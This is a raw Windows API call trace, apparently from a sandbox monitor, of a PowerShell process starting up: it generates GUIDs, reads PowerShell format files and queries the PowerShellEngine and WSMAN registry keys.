	[0732.275] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xfb4af645, Data2=0xd1c4, Data3=0x416c, Data4=([0]=0x8c, [1]=0x1a, [2]=0x24, [3]=0xf7, [4]=0x41, [5]=0xc4, [6]=0x44, [7]=0xf6))) returned 0x0
	[0732.275] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x4f69435b, Data2=0xb239, Data3=0x40da, Data4=([0]=0x9f, [1]=0xa0, [2]=0xd8, [3]=0xb1, [4]=0x5b, [5]=0x0, [6]=0x73, [7]=0xd2))) returned 0x0
	[0732.275] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x6a2815b, Data2=0x76a1, Data3=0x457c, Data4=([0]=0x9a, [1]=0xd0, [2]=0xea, [3]=0x20, [4]=0x84, [5]=0x8, [6]=0x9e, [7]=0x40))) returned 0x0
	[0732.275] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x7d720d1, Data2=0xd44e, Data3=0x4d61, Data4=([0]=0x85, [1]=0xe4, [2]=0x7c, [3]=0x97, [4]=0x39, [5]=0x2, [6]=0xa3, [7]=0x36))) returned 0x0
	[0732.275] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x545ccf0e, Data2=0x9b7, Data3=0x4371, Data4=([0]=0xaa, [1]=0x32, [2]=0x54, [3]=0x80, [4]=0x79, [5]=0x8d, [6]=0x57, [7]=0x5a))) returned 0x0
	[0732.276] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xb384fb48, Data2=0x9ef7, Data3=0x4964, Data4=([0]=0x91, [1]=0xeb, [2]=0x49, [3]=0xc6, [4]=0x44, [5]=0x1e, [6]=0x6f, [7]=0x46))) returned 0x0
	[0732.276] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xc88035db, Data2=0xcead, Data3=0x4b98, Data4=([0]=0x9a, [1]=0x73, [2]=0xcb, [3]=0x2e, [4]=0x97, [5]=0xb6, [6]=0x1a, [7]=0x6d))) returned 0x0
	[0732.276] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x54649b22, Data2=0xb8b6, Data3=0x41eb, Data4=([0]=0x9c, [1]=0x1a, [2]=0xfd, [3]=0xf4, [4]=0xc9, [5]=0x99, [6]=0x98, [7]=0x7))) returned 0x0
	[0732.276] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x79067321, Data2=0xb9d8, Data3=0x4c31, Data4=([0]=0x89, [1]=0x57, [2]=0x6d, [3]=0x31, [4]=0x1f, [5]=0x9f, [6]=0xc0, [7]=0xa3))) returned 0x0
	[0732.276] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xb4f9db72, Data2=0xd04b, Data3=0x4f53, Data4=([0]=0x8c, [1]=0xa2, [2]=0xec, [3]=0xf4, [4]=0x3d, [5]=0xb8, [6]=0x97, [7]=0x2f))) returned 0x0
	[0732.276] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x8efa243f, Data2=0x48d3, Data3=0x4007, Data4=([0]=0x84, [1]=0x65, [2]=0x9c, [3]=0x1c, [4]=0xce, [5]=0xc0, [6]=0x5, [7]=0xa4))) returned 0x0
	[0732.277] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x735cf054, Data2=0xc357, Data3=0x42d8, Data4=([0]=0x9b, [1]=0x7c, [2]=0x3e, [3]=0x8, [4]=0x4d, [5]=0x3, [6]=0x75, [7]=0x30))) returned 0x0
	[0732.277] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x43802876, Data2=0x4dca, Data3=0x420c, Data4=([0]=0x9b, [1]=0xd4, [2]=0xf1, [3]=0x38, [4]=0x82, [5]=0x10, [6]=0xf5, [7]=0xd6))) returned 0x0
	[0732.277] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xb472aa1c, Data2=0x7838, Data3=0x4214, Data4=([0]=0x81, [1]=0xff, [2]=0x4, [3]=0xe0, [4]=0x63, [5]=0x41, [6]=0xe6, [7]=0x2f))) returned 0x0
	[0732.277] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x3b2de000, Data2=0xd27b, Data3=0x4171, Data4=([0]=0xab, [1]=0x35, [2]=0x35, [3]=0xfb, [4]=0x58, [5]=0xa1, [6]=0x83, [7]=0x39))) returned 0x0
	[0732.277] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x6630a99e, Data2=0xd70c, Data3=0x4e03, Data4=([0]=0x98, [1]=0x8f, [2]=0x77, [3]=0xef, [4]=0x7a, [5]=0xe0, [6]=0x91, [7]=0x3e))) returned 0x0
	[0732.277] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x8cb0cf7b, Data2=0x6a88, Data3=0x47e3, Data4=([0]=0xaa, [1]=0xd6, [2]=0x5b, [3]=0xe1, [4]=0x2b, [5]=0x14, [6]=0x57, [7]=0x65))) returned 0x0
	[0732.277] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xc3b708d5, Data2=0x2385, Data3=0x4f5a, Data4=([0]=0x80, [1]=0x6, [2]=0x3b, [3]=0x62, [4]=0xbf, [5]=0xfd, [6]=0xd3, [7]=0x91))) returned 0x0
	[0732.278] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x9ddf9d38, Data2=0x6194, Data3=0x4709, Data4=([0]=0x9b, [1]=0xbe, [2]=0x7a, [3]=0x53, [4]=0x74, [5]=0xe2, [6]=0xa4, [7]=0xc9))) returned 0x0
	[0732.278] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xafe51566, Data2=0x9e97, Data3=0x4e43, Data4=([0]=0x95, [1]=0x1d, [2]=0x80, [3]=0x30, [4]=0xd, [5]=0x68, [6]=0x9c, [7]=0xf9))) returned 0x0
	[0732.278] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x31ece559, Data2=0x4b80, Data3=0x4dec, Data4=([0]=0xb6, [1]=0xdf, [2]=0x94, [3]=0xb0, [4]=0x32, [5]=0x64, [6]=0x12, [7]=0x25))) returned 0x0
	[0732.278] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x1755b997, Data2=0x808, Data3=0x406e, Data4=([0]=0x9f, [1]=0x2c, [2]=0xa4, [3]=0x93, [4]=0x54, [5]=0x89, [6]=0xdc, [7]=0x47))) returned 0x0
	[0732.278] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xcd1a3836, Data2=0x4b74, Data3=0x42bb, Data4=([0]=0xac, [1]=0x8e, [2]=0x7a, [3]=0x57, [4]=0x1e, [5]=0x1c, [6]=0xca, [7]=0x2c))) returned 0x0
	[0732.278] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x89dc19df, Data2=0x5405, Data3=0x44f7, Data4=([0]=0xa2, [1]=0xbc, [2]=0x82, [3]=0x11, [4]=0x7f, [5]=0x5c, [6]=0xb8, [7]=0x87))) returned 0x0
	[0732.278] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xf3d9c84e, Data2=0xb903, Data3=0x4ad1, Data4=([0]=0x86, [1]=0xcb, [2]=0x6d, [3]=0x8f, [4]=0x57, [5]=0x98, [6]=0x19, [7]=0x3b))) returned 0x0
	[0732.279] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x1543ba13, Data2=0x61a2, Data3=0x41b5, Data4=([0]=0x8b, [1]=0x63, [2]=0x94, [3]=0x5f, [4]=0x3f, [5]=0xf5, [6]=0xfa, [7]=0x37))) returned 0x0
	[0732.279] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x864a2ede, Data2=0x513d, Data3=0x41ea, Data4=([0]=0x89, [1]=0x0, [2]=0x90, [3]=0x21, [4]=0x5, [5]=0xa6, [6]=0xf7, [7]=0xcc))) returned 0x0
	[0732.279] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xdeb7f2, Data2=0x3a20, Data3=0x4613, Data4=([0]=0x82, [1]=0xa9, [2]=0x20, [3]=0xa7, [4]=0x2d, [5]=0x23, [6]=0x41, [7]=0xb4))) returned 0x0
	[0732.279] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xebcb082d, Data2=0x67f, Data3=0x4831, Data4=([0]=0x93, [1]=0x67, [2]=0x8a, [3]=0x10, [4]=0xf2, [5]=0xb6, [6]=0xc2, [7]=0x3d))) returned 0x0
	[0732.279] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xd82c9766, Data2=0xc189, Data3=0x4ad5, Data4=([0]=0x83, [1]=0xf7, [2]=0xcd, [3]=0x6a, [4]=0x0, [5]=0xad, [6]=0x35, [7]=0x74))) returned 0x0
	[0732.279] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x590ea48, Data2=0xcfde, Data3=0x4fb0, Data4=([0]=0xa6, [1]=0x91, [2]=0xda, [3]=0x6a, [4]=0x5b, [5]=0x2, [6]=0x7, [7]=0x3))) returned 0x0
	[0732.279] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x7d09bcca, Data2=0x7e9e, Data3=0x46ca, Data4=([0]=0x84, [1]=0x62, [2]=0x2a, [3]=0xfe, [4]=0x7, [5]=0x62, [6]=0xbb, [7]=0x4a))) returned 0x0
	[0732.295] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x4ea6c2ca, Data2=0x3204, Data3=0x4cdb, Data4=([0]=0x94, [1]=0xe7, [2]=0xe, [3]=0x54, [4]=0x93, [5]=0xe7, [6]=0x97, [7]=0xc3))) returned 0x0
	[0732.296] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x47e08b8a, Data2=0x664a, Data3=0x4e10, Data4=([0]=0x89, [1]=0x95, [2]=0x60, [3]=0xde, [4]=0x6f, [5]=0x33, [6]=0x96, [7]=0x81))) returned 0x0
	[0732.296] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x9c9dd60e, Data2=0xd02e, Data3=0x4113, Data4=([0]=0x95, [1]=0xa7, [2]=0x7f, [3]=0x7b, [4]=0x1, [5]=0x94, [6]=0x56, [7]=0x20))) returned 0x0
	[0732.296] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xb7b6e86b, Data2=0xa7a0, Data3=0x404f, Data4=([0]=0xac, [1]=0x5, [2]=0x96, [3]=0x15, [4]=0xea, [5]=0x6, [6]=0x4e, [7]=0x1))) returned 0x0
	[0732.296] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x31bbcdc9, Data2=0x98e, Data3=0x46b2, Data4=([0]=0x89, [1]=0x0, [2]=0xc5, [3]=0x64, [4]=0x82, [5]=0x66, [6]=0x1d, [7]=0xae))) returned 0x0
	[0732.296] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x66542e3d, Data2=0xeb0, Data3=0x439b, Data4=([0]=0x90, [1]=0x4f, [2]=0x1d, [3]=0x60, [4]=0xbd, [5]=0xd9, [6]=0x4a, [7]=0xe1))) returned 0x0
	[0732.296] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x3e2e3648, Data2=0x1d90, Data3=0x43e6, Data4=([0]=0x88, [1]=0x6, [2]=0xe9, [3]=0x40, [4]=0x9f, [5]=0xb9, [6]=0x59, [7]=0xd5))) returned 0x0
	[0732.297] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x74edc0ce, Data2=0x3432, Data3=0x4d3c, Data4=([0]=0x80, [1]=0x26, [2]=0x1d, [3]=0xcb, [4]=0xc0, [5]=0xd2, [6]=0x7f, [7]=0xae))) returned 0x0
	[0732.297] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x1fbb4557, Data2=0xed0e, Data3=0x4cf3, Data4=([0]=0xa7, [1]=0x93, [2]=0x3, [3]=0x7e, [4]=0x42, [5]=0x84, [6]=0x97, [7]=0x6e))) returned 0x0
	[0732.297] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x7e022ab5, Data2=0x1d80, Data3=0x4c22, Data4=([0]=0x8d, [1]=0x17, [2]=0xf6, [3]=0x5b, [4]=0x2c, [5]=0x97, [6]=0x59, [7]=0x1b))) returned 0x0
	[0732.297] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xcd1ec805, Data2=0x16a8, Data3=0x459d, Data4=([0]=0xb1, [1]=0xa2, [2]=0xce, [3]=0x15, [4]=0xa8, [5]=0x4a, [6]=0xb, [7]=0xa8))) returned 0x0
	[0732.297] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x9bf0262a, Data2=0x5997, Data3=0x42e6, Data4=([0]=0x89, [1]=0xe4, [2]=0xe6, [3]=0xb6, [4]=0xa7, [5]=0x18, [6]=0xd6, [7]=0x60))) returned 0x0
	[0732.297] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x9c45e386, Data2=0x22ae, Data3=0x4d56, Data4=([0]=0x95, [1]=0xe8, [2]=0x46, [3]=0x1, [4]=0xde, [5]=0x36, [6]=0x4, [7]=0x49))) returned 0x0
	[0732.298] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x30958201, Data2=0xebc5, Data3=0x403c, Data4=([0]=0x96, [1]=0x5b, [2]=0xb6, [3]=0xcb, [4]=0x5c, [5]=0x6, [6]=0x48, [7]=0xf6))) returned 0x0
	[0732.298] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x468d854c, Data2=0xdce2, Data3=0x46c4, Data4=([0]=0x8a, [1]=0x56, [2]=0xe2, [3]=0x4d, [4]=0x9c, [5]=0x33, [6]=0x38, [7]=0xe5))) returned 0x0
	[0732.298] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308
	[0732.298] GetFileType (hFile=0x308) returned 0x1
	[0732.298] SetErrorMode (uMode=0x1) returned 0x1
	[0732.298] GetFileType (hFile=0x308) returned 0x1
	[0732.298] ReadFile (in: hFile=0x308, lpBuffer=0x2d7cfd8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d7cfd8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0732.299] ReadFile (in: hFile=0x308, lpBuffer=0x2d7cfd8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d7cfd8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0732.300] ReadFile (in: hFile=0x308, lpBuffer=0x2d7cfd8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d7cfd8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0732.300] ReadFile (in: hFile=0x308, lpBuffer=0x2d7cfd8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d7cfd8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0732.300] ReadFile (in: hFile=0x308, lpBuffer=0x2d7cfd8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d7cfd8*, lpNumberOfBytesRead=0x26d1f8*=0x8b4, lpOverlapped=0x0) returned 1
	[0732.300] ReadFile (in: hFile=0x308, lpBuffer=0x2d7c3f4, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d7c3f4*, lpNumberOfBytesRead=0x26d1f8*=0x0, lpOverlapped=0x0) returned 1
	[0732.300] ReadFile (in: hFile=0x308, lpBuffer=0x2d7cfd8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d7cfd8*, lpNumberOfBytesRead=0x26d1f8*=0x0, lpOverlapped=0x0) returned 1
	[0732.301] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d288 | out: phkResult=0x26d288*=0x308) returned 0x0
	[0732.301] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d20c, lpData=0x0, lpcbData=0x26d208*=0x0 | out: lpType=0x26d20c*=0x1, lpData=0x0, lpcbData=0x26d208*=0x56) returned 0x0
	[0732.301] CoTaskMemAlloc (cb=0x5a) returned 0x1b890070
	[0732.301] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d1dc, lpData=0x1b890070, lpcbData=0x26d1d8*=0x56 | out: lpType=0x26d1dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d1d8*=0x56) returned 0x0
	[0732.301] CoTaskMemFree (pv=0x1b890070) 
	[0732.301] RegCloseKey (hKey=0x308) returned 0x0
	[0732.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0732.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0732.302] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x53daaf0f, Data2=0x3c2f, Data3=0x4719, Data4=([0]=0xb2, [1]=0xb5, [2]=0xbe, [3]=0xe8, [4]=0x98, [5]=0x56, [6]=0x75, [7]=0x84))) returned 0x0
	[0732.302] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xa1ecb037, Data2=0xfc42, Data3=0x4e4c, Data4=([0]=0x8b, [1]=0xec, [2]=0x65, [3]=0x4f, [4]=0x2c, [5]=0x5a, [6]=0x6b, [7]=0x4e))) returned 0x0
	[0732.302] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308
	[0732.302] GetFileType (hFile=0x308) returned 0x1
	[0732.302] SetErrorMode (uMode=0x1) returned 0x1
	[0732.302] GetFileType (hFile=0x308) returned 0x1
	[0732.302] ReadFile (in: hFile=0x308, lpBuffer=0x2dbadc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2dbadc0*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0733.728] ReadFile (in: hFile=0x308, lpBuffer=0x2dbadc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2dbadc0*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0733.729] ReadFile (in: hFile=0x308, lpBuffer=0x2dbadc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2dbadc0*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0733.729] ReadFile (in: hFile=0x308, lpBuffer=0x2dbadc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2dbadc0*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0733.729] ReadFile (in: hFile=0x308, lpBuffer=0x2dbadc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2dbadc0*, lpNumberOfBytesRead=0x26d1f8*=0xe98, lpOverlapped=0x0) returned 1
	[0733.729] ReadFile (in: hFile=0x308, lpBuffer=0x2dba3c0, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2dba3c0*, lpNumberOfBytesRead=0x26d1f8*=0x0, lpOverlapped=0x0) returned 1
	[0733.729] ReadFile (in: hFile=0x308, lpBuffer=0x2dbadc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2dbadc0*, lpNumberOfBytesRead=0x26d1f8*=0x0, lpOverlapped=0x0) returned 1
	[0733.730] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d288 | out: phkResult=0x26d288*=0x308) returned 0x0
	[0733.730] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d20c, lpData=0x0, lpcbData=0x26d208*=0x0 | out: lpType=0x26d20c*=0x1, lpData=0x0, lpcbData=0x26d208*=0x56) returned 0x0
	[0733.730] CoTaskMemAlloc (cb=0x5a) returned 0x1b890070
	[0733.733] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d1dc, lpData=0x1b890070, lpcbData=0x26d1d8*=0x56 | out: lpType=0x26d1dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d1d8*=0x56) returned 0x0
	[0733.733] CoTaskMemFree (pv=0x1b890070) 
	[0733.733] RegCloseKey (hKey=0x308) returned 0x0
	[0733.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0733.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0733.734] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xca8a9605, Data2=0x69ec, Data3=0x4134, Data4=([0]=0x9e, [1]=0x10, [2]=0xba, [3]=0xc1, [4]=0x14, [5]=0x9d, [6]=0x1, [7]=0x96))) returned 0x0
	[0733.734] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x7577d8cb, Data2=0xd9f6, Data3=0x4697, Data4=([0]=0xa6, [1]=0xf9, [2]=0xbb, [3]=0x19, [4]=0x51, [5]=0x6e, [6]=0x17, [7]=0x8f))) returned 0x0
	[0733.748] CoTaskMemAlloc (cb=0x104) returned 0x444820
	[0733.748] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0733.748] CoTaskMemFree (pv=0x444820) 
	[0733.750] CoTaskMemAlloc (cb=0x104) returned 0x444820
	[0733.750] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0733.750] CoTaskMemFree (pv=0x444820) 
	[0733.751] CoTaskMemAlloc (cb=0x104) returned 0x444820
	[0733.751] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0733.751] CoTaskMemFree (pv=0x444820) 
	[0733.753] CoTaskMemAlloc (cb=0x104) returned 0x444820
	[0733.753] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0733.753] CoTaskMemFree (pv=0x444820) 
	[0733.764] CoTaskMemAlloc (cb=0x104) returned 0x444820
	[0733.764] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0733.764] CoTaskMemFree (pv=0x444820) 
	[0735.301] CoTaskMemAlloc (cb=0x104) returned 0x444820
	[0735.301] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0735.301] CoTaskMemFree (pv=0x444820) 
	[0735.302] CoTaskMemAlloc (cb=0x104) returned 0x444820
	[0735.302] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0735.303] CoTaskMemFree (pv=0x444820) 
	[0735.316] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d498 | out: phkResult=0x26d498*=0x308) returned 0x0
	[0735.320] RegQueryInfoKeyW (in: hKey=0x308, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x26d39c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d398, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x26d39c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d398*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0735.320] CoTaskMemFree (pv=0x0) 
	[0735.321] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0735.321] RegEnumValueW (in: hKey=0x308, dwIndex=0x0, lpValueName=0x4469e0, lpcchValueName=0x26d448, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x26d448, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0735.321] CoTaskMemFree (pv=0x4469e0) 
	[0735.321] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0735.321] RegEnumValueW (in: hKey=0x308, dwIndex=0x1, lpValueName=0x4469e0, lpcchValueName=0x26d448, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x26d448, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0735.321] CoTaskMemFree (pv=0x4469e0) 
	[0735.321] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0735.321] RegEnumValueW (in: hKey=0x308, dwIndex=0x2, lpValueName=0x4469e0, lpcchValueName=0x26d448, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x26d448, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0735.321] CoTaskMemFree (pv=0x4469e0) 
	[0735.321] RegQueryValueExW (in: hKey=0x308, lpValueName="StackVersion", lpReserved=0x0, lpType=0x26d42c, lpData=0x0, lpcbData=0x26d428*=0x0 | out: lpType=0x26d42c*=0x1, lpData=0x0, lpcbData=0x26d428*=0x8) returned 0x0
	[0735.321] CoTaskMemAlloc (cb=0xc) returned 0x466bd0
